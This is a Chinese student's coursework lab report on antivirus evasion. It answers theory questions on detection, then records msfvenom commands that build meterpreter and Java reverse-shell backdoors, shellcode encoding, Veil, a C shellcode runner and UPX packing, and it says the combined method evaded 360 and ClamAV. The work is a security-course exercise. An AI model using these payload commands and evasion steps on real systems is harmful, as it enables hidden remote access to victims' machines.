首页 > 其他分享 >20211317李卓桐Exp3-免杀原理实验报告

20211317李卓桐Exp3-免杀原理实验报告

时间:2024-04-04 23:00:36浏览次数:16  
标签:1317 文件 exe 免杀 Exp3 恶意代码 20211317 shellcode

Exp3-免杀原理

任务详情

1. 实践内容(4分+1分附加分)

1.1 方法(分)

  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件(1分),
  • veil,加壳工具(1分),
  • 使用C + shellcode编程(1分),

1.2 通过组合应用各种技术实现恶意代码免杀(1分)
(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
1.3 附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分1)

2 报告内容(2分):

2.1.基础问题回答(1分)

(1)杀软是如何检测出恶意代码的?

(2)免杀是做什么?

(3)免杀的基本方法有哪些?

(4)开启杀软能绝对防止电脑中恶意代码吗?

2.2.实践总结与体会(1分)

2.3.实践过程记录

3.报告质量评分 2 分

3.1 报告整体观感 1分
3.1.1 报告格式范围,版面整洁 加1。
3.1.2 报告排版混乱,加0分。

3.2 文字表述 1 分
3.2.1报告文字内容全面,表述清晰准确 加1分。
3.2.2报告表述不清或文字有明显抄袭可能 加0

3.3 截图要求:
3.3.1 所有操作截图主机名为本人姓名拼音
3.3.2 所编辑的文件名包含自己的学号
如未按如上格式要求,则相应部分报告内容不记成绩

基础问题回答

  • 杀软是如何检测出恶意代码的?
    答:杀毒软件(简称“杀软”)检测恶意代码的方法主要包括但不限于以下几种:
    1.特征码匹配:杀毒软件拥有庞大的病毒特征库,通过扫描文件或内存中的特定字符串或二进制模式来识别已知恶意软件。
    2.启发式扫描:即使没有具体的特征码匹配,杀软也会检查文件的行为和结构,寻找可能表明恶意活动的指示,比如异常的入口点、自我复制机制、解密/加密行为、注入其他进程等。
    3.行为监控:实时监控系统活动,如注册表修改、文件创建、网络连接等,并根据预定义的规则判断是否有恶意行为。
    4.沙箱技术:在隔离环境中运行可疑文件,观察其动态行为,以确定是否对系统产生危害。
    5.机器学习和人工智能:通过训练模型识别潜在的恶意模式,即使面对新型未知威胁也能有一定的预测和防护能力。
  • 免杀是做什么?
    答:免杀技术是指黑客或者恶意代码作者为了绕过杀毒软件的检测和查杀机制,对恶意代码进行改造或者伪装的过程。目的是让恶意代码能够成功在目标系统上运行而不被杀毒软件检测出来。
  • 免杀的基本方法有哪些?
    答:免杀的基本方法包括但不限于:
    1.改变特征码:修改或混淆恶意代码的关键部分,使其不与杀毒软件的病毒库特征码匹配。
    2.行为变异:改变恶意代码的执行逻辑或传播方式,使其在行为特征上难以被识别为恶意。
    3.内存免杀:仅在内存中动态加载和执行恶意代码,避免静态扫描。
    4.加壳:使用加壳工具对恶意代码进行封装,隐藏原始代码。
    5.代码混淆:通过复杂化代码结构、插入无效代码、使用加密算法等方式增加逆向分析难度。
    6.花指令:插入无实际功能但能干扰反汇编和理解的指令序列。
    7.社会工程学:结合心理操纵手段,让用户自愿下载或执行恶意代码,而非直接突破技术防线。
    8.利用漏洞:例如利用操作系统或应用软件的漏洞,绕过安全检测。
    9.白加黑技术:将恶意代码与合法文件捆绑,利用合法文件的正常属性来逃避检测。
  • 开启杀软能绝对防止电脑中恶意代码吗?
    答:开启杀软并不能绝对防止电脑中恶意代码。尽管杀毒软件在防范已知威胁方面表现良好,但对于新型、未知的恶意代码,尤其是针对性强、采用先进免杀技术的恶意软件,可能会存在漏报或无法有效拦截的情况。此外,用户的安全意识、系统补丁更新及时性以及杀软自身的更新速度等因素也直接影响了杀软的防护效果。因此,保持系统和软件更新、提高安全意识、采取多层防御策略是非常重要的。

实验步骤

正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.5.202 LPORT=1317 -f exe > backdoor_20211317_1.exe

  • 编码10次,还是一样的检出率
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 10 LHOST=192.168.187.132 LPORT=5310 -f exe > met-encoded.exe

  • 编码会降低检出率,理论上讲多编码几次,可降低被检测出的可能性
  • 一次编码使用命令:-e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符

检出率减少一次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -i -10 -b ‘\x00’ LHOST=172.30.5.202 LPORT=1317 -f exe > backdoor2.exe

  • 生成.jar文件 百度啊腾讯啊都没检测出来病毒了
    msfvenom -p java/shell_reverse_tcp LHOST=172.30.5.202 LPORT=1317 -f jar > backdoor_jar.jar

下载veil,显示Done即为下载成功


安装好后显示如下:

  • 设置反弹连接IP,输入Kali的IP:set LHOST 【ip地址】

  • 设置端口:set LPORT 1317,完成配置,可输入option查看当前配置

  • 输入generate生成后门程序文件,并命名veil_1317,

  • 检验可用性,通过率为48/72

C语言调用

先用msf生成一段C语言格式的shellcode数组,下面指令会生成一个c语言格式的Shellcode数组。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1317 -f c


将上述代码编译成c文件

vim 20211317shellcode2.c int main() { int (*func)() = (int(*)())buf; func(); }

编译成可执行文件
i686-w64-mingw32-g++ 20211317shellcode2.c -o 20211317shellcode2.exe

  • 检测恶意代码

加壳

输入如下指令进行加壳
upx 1317.exe -o 1317_upx.exe

检出率为34/72

通过组合应用各种技术实现恶意代码免杀

本实验我选择通过C+shellcode+逆序+压缩壳实现免杀,即在上一部分的基础上加上逆序和压缩壳。

  • 首先与上一步相同,使用如下指令生成一段C语言格式的shellcode代码
    image
  • 将生成的shellcode加上如下代码段一起复制到Windows系统下的VScode中,保存、编译并运行,生成另一段shellcode(此处进行的是逆序变换,使生成的文件中shellcode逆序存在,更不容易被杀软发现)
    image
  • 回到Kali内,用touch与vim指令创建并编辑一个新文件,将刚刚在Windows下运行生成的那段代码粘贴到新文件内,并加上另一段如下所示代码段。编辑完毕后保存并退出。
    image
  • 同样地,使用i686-w64-mingw32-g++ lzt1317.c -o 1317.exe将文件编译生成可执行文件,再进行加壳
    image
  • 将加壳后生成的文件用360杀毒进行查杀,显示未发现安全威胁,将可执行文件上传至网站进行检测,也可以看到检测率大大降低,可以躲过大部分杀软。
    image

附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分1)

  • 这里打开我的另一台Ubuntu虚拟机进行测试,安装的杀毒软件为ClamAV,版本就是最新版
    • ClamAV (Clamscan) - 一个命令行的扫描工具,用于扫描病毒、恶意软件和恶意代码。
      sudo apt-get install clamav clamav-daemon
  • ClamTk - ClamAV的图形界面前端。
    sudo apt-get install clamtk

  • 将加壳过后的文件传至虚拟机中,该文件在检测时成功逃过ClamAV的检测
  • 点击扫描文件,进行扫描


成功运行,未发现威胁!

实验问题

主要就是装veil的时候会遇到各种报错,参考了相关博客进行解决。
https://blog.csdn.net/qq_53079406/article/details/126192511
因为我的kali是64位程序,而用的wine是32位的,所以需要先装32位的环境。

实验心得体会

作为一名信息安全专业的学生,这次免杀技术和杀软工作机制的实践体验确实让我获益匪浅,不仅加深了对免杀流程的理解,还意识到即使是最先进的杀毒软件也存在滞后性和应对新型恶意软件时的局限性。在日常的计算机操作中,我们必须始终保持警觉,不能仅仅因为安装了杀毒软件就盲目自信,而应该时刻注意监测和排查电脑中的可疑活动,以防恶意软件趁虚而入。

标签:1317,文件,exe,免杀,Exp3,恶意代码,20211317,shellcode
From: https://www.cnblogs.com/lizhuotong/p/18113375

相关文章

  • 第3次实验-免杀原理
    第3次实验1基础问题回答(1)杀软是如何检测出恶意代码的?杀毒软件检测恶意代码的主要方法包括:签名检测:这是最传统的方法,依赖于一个不断更新的恶意软件签名数据库。杀软通过比对文件的特征码(签名)与已知恶意软件的特征码进行匹配来检测恶意代码。行为分析:杀软监控程序的行为,包括对......
  • 内网渗透-免杀
    木马免杀免杀主要是对木马对应的二进制码(shellcode)进行混淆、加密(绕过特征检测),让杀毒软件识别不出来。msfvenom-shellcode使用msf生成shellcode(马对应的16进制),再使用高级语言加载上述生成的shellcode。然后把python程序打包成exe文件msfvenom-pwindows/x64/meterpreter/reve......
  • 红队攻防之exe文件签名免杀
    达则兼善天下,穷则独善其身1、生成cobaltstrikebin文件,选择raw选项。2、使用cobaltstrike分离免杀工具生成loader.exe文件。3、使用UPX对生成的exe文件进行加壳,加壳前后对比文件的大小。4、对loader.exe进行制作并签发证书-数字签名。(1)、检查程序中是否存证书。......
  • Powershell免杀系列(二)
    powershell的免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。该工具可以对powershell代码进行ASCII/hex/octal/binary/SecureString进行加密混淆。执行如下命......
  • 某资产管理系统打点过程中的免杀经历
    上周初,被扔过来单位内部的一个链接,让渗透一下,本以为三下五除二很快就能测完,没想到在对抗杀软时费了一番功夫,再加上杂七杂八的事儿,经过了一个星期才测完(# ̄~ ̄#)。打开链接,见到一个熟悉的登录框,是一个资产管理系统。在进行了一番端口目录、认证机制、会话管理、授权访问等方面的检查后......
  • 钓鱼手法及木马免杀技巧
     简述钓鱼是攻防对抗中一种常用的手段,攻击者通常伪装成可信任的实体,例如合法的机构、公司或个人,以引诱受害者揭示敏感信息或执行恶意操作,能快速地撕破目标的伤口,快速进内网进行刷分,投递木马同时需要考虑逃避杀毒软件检测,本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开......
  • 免杀-绕过静态动态查杀
    前言在我们后渗透时很多时候需要使用到一些敏感的工具,而这些工具大多都被360等杀软厂商标记。导致我们传入的工具无法执行或执行时被拦截。接下来以测试工具mimitakz为例演示如何绕过这些杀软拦截,躲避查杀等。以下为具体开发细节,程序执行时杀软拦截360静态查杀何为"静态查......
  • Webshell混淆免杀的一些思路
    1、简介为了避免被杀软检测到,黑客们会对Webshell进行混淆免杀。本文将介绍一些Webshell混淆免杀的思路,帮助安全人员更好地防范Webshell攻击。静态免杀是指通过对恶意软件进行混淆、加密或其他技术手段,使其在静态分析阶段难以被杀毒软件或安全防护产品所检测出来的方法。静态免杀......
  • 免杀方法集结
     免杀技术一套(免杀方法大集结)00.概述什么是免杀?来自百科的注解:免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写VirusAV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》其实我大......
  • 内网渗透-免杀
    内网渗透-免杀全文内容来自网络,如有冒犯立删。目录内网渗透-免杀杀软原理静态检测动态检测流量检测云查杀免杀原理静态免杀修改特征码花指令免杀加壳免杀动态免杀API免杀内存免杀二次编译分离免杀资源修改免杀技术研究Bypass一览表(2020年)Bypass一览表(2022年)复现环境(2022年)Meta......